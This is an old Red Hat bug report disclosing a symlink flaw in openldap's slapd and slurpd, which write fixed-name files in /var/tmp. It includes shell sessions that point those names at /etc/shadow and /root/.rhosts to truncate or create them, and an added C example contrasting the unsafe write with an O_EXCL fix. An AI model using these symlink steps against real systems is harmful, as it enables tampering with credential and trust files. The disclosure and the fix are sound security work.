Bug 10714

Summary: Insecure file creation using static files which follow symlinks.
Product: [Retired] Red Hat Linux
Reporter: SB <satan>
Component: openldap
Assignee: Nalin Dahyabhai <nalin>
Status: CLOSED ERRATA
Severity: medium
Priority: high
Version: 6.2
CC: dr
Keywords: Security
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2000-04-24 06:41:33 UTC

Description SB 2000-04-11 00:57:44 UTC
I was trying out the new openldap package (openldap-1.2.9-5) and I noticed
it blindly creates some files which follow symlinks and will overwrite any
file without notification. For example:

[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# ln -s /etc/shadow.test /var/tmp/NEXTID
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
lrwxrwxrwx    1 root     root           13 Apr 10 20:55 NEXTID -> /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap start
Starting ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap stop
Shutting down ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root            2 Apr 10 21:04 /etc/shadow.test
[root@king /]#

Apparently when slapd terminates it creates the file NEXTID in /var/tmp
(actually it follows symlink from /usr/tmp).  It will create and
overwrite files.  slurpd has a similar problem:

[root@king /]# ls -al /root/.rhosts
ls: /root/.rhosts: No such file or directory
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
-rw-r--r--    1 root     root            0 Apr 10 20:59 slurpd.status
[root@king /]#
[root@king /]# rm /var/tmp/slurpd.status
[root@king /]# ln -s /root/.rhosts /var/tmp/slurpd.status
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /root/.rhosts
-rw-r--r--    1 root     root            0 Apr 10 21:01 /root/.rhosts
[root@king /]#

slurpd, to my knowledge, will only create files; it will not overwrite or
truncate previously existing files.  Also, after slapd is running, if you
type slurpd, it will try to read from /var/tmp/slurpd.status, fail, and then
write to /var/tmp/slurpd.status.lock, which can be a symlink to any file you
wish to create, and truncate any existing file to 0 bytes.  There are other
instances I noticed in the code, such as /tmp/slurpd.dump and other files that
probably behave the same. Not good.

-Stan Bubrouski
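
The file-creation pattern reported above, as an added example that is not code from OpenLDAP or from the released erratum: a truncating create that follows a symlink, next to an exclusive create that refuses one. The function names and the scratch directory are hypothetical, and the 780-byte victim file is constructed to mirror the listing in the report.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the report describes: a truncating create that follows symlinks. */
int write_state_naive(const char *path, const char *data) {
    FILE *fp = fopen(path, "w");
    if (!fp) return -errno;
    fputs(data, fp);
    return fclose(fp) == 0 ? 0 : -errno;
}

/* Hardened form: O_CREAT|O_EXCL fails if the name already exists, including
 * as a symlink (dangling or not); O_NOFOLLOW states the intent explicitly. */
int write_state_safe(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -errno;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -EIO;
}

/* Constructed scenario: a private scratch dir with a 780-byte "victim" file and
 * a NEXTID symlink to it. Runs one writer through the symlink, stores its result
 * in *rc, and returns the victim's size afterwards (-1 on setup failure). */
long victim_size_after(int use_safe, int *rc) {
    char dir[] = "/tmp/nextid-demo-XXXXXX", victim[64], lnk[64], fill[780];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/NEXTID", dir);
    memset(fill, 'x', sizeof fill);
    FILE *fp = fopen(victim, "w");
    if (!fp || fwrite(fill, 1, sizeof fill, fp) != sizeof fill) return -1;
    fclose(fp);
    if (symlink(victim, lnk) != 0) return -1;
    *rc = use_safe ? write_state_safe(lnk, "1\n") : write_state_naive(lnk, "1\n");
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(lnk); unlink(victim); rmdir(dir);
    return size;
}
int main(void) {
    int rc_naive, rc_safe;
    long naive = victim_size_after(0, &rc_naive), safe = victim_size_after(1, &rc_safe);
    printf("naive: rc=%d victim=%ld\nsafe:  rc=%d victim=%ld\n", rc_naive, naive, rc_safe, safe);
}
```

A daemon that must reuse a fixed file name across restarts cannot rely on O_EXCL alone; keeping such state files in a directory only the service account can write to removes the precondition entirely.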

Comment 1 Cristian Gafton 2000-04-24 06:41:59 UTC
Errata released that fixes the problem.